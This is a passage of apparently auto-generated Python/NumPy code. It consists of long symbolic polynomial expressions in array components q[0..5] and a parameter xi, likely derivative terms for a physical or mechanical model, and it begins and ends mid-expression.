0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 99887.2123151958*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1053.49794238683*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 4.44444444444444*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) + (60131984.3684659*xi**9*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(-4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-q[0, 0] - q[1, 0] + 2*q[2, 0]) + 4810558749.47727*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 26.6666666666667*numpy.sqrt(3)) + (-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-q[0, 0] - q[1, 0] + 2*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]) - 12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0]) - 12828156665.2727*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 405890894.487145*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 7990976.98521566*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 84279.8353909465*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 355.555555555555*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])) + (-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*((-2435345366.92287*q[1, 0] + 2435345366.92287*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + (-505679.012345679*q[1, 0] + 505679.012345679*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 38484469995.8182*(q[1, 0] - q[2, 0])**2*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 23972930.955647*(q[1, 0] - q[2, 0])**2*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 252839.506172839*(q[1, 0] - q[2, 0])**2*(-q[0, 0] - q[1, 0] + 2*q[2, 0]) + (47945861.911294*q[1, 0] - 47945861.911294*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (76968939991.6364*q[1, 0] - 76968939991.6364*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 2133.33333333333*q[1, 0] - 2133.33333333333*q[2, 0]), (-4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(60131984.3684659*xi**9*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 60131984.3684659*xi**9*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(6*q[3, 0] - 3*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1522090.85432679*xi**7*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 22474.6227709191*xi**5*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) - 79.0123456790123*xi**3*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi) + (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 320703916.631818*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(6*q[3, 0] - 3*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 10147272.3621786*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 199774.424630392*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 2106.99588477366*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0]) - 8.88888888888889*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (-38484469995.8182*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 23972930.955647*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 252839.506172839*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 1066.66666666667*(q[1, 0] - q[2, 0])**2 + 1)*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(6*q[3, 0] - 3*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 2106.99588477366*numpy.sqrt(3)*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])), (-4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(60131984.3684659*xi**9*(-4*q[3, 0] + 8*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 60131984.3684659*xi**9*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(-3*q[3, 0] + 6*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1522090.85432679*xi**7*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 22474.6227709191*xi**5*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) - 79.0123456790123*xi**3*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi) + (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-160351958.315909*xi**10*(-4*q[3, 0] + 8*q[4, 0] - 4*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 160351958.315909*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(-3*q[3, 0] + 6*q[4, 0] - 3*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 5073636.18108931*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 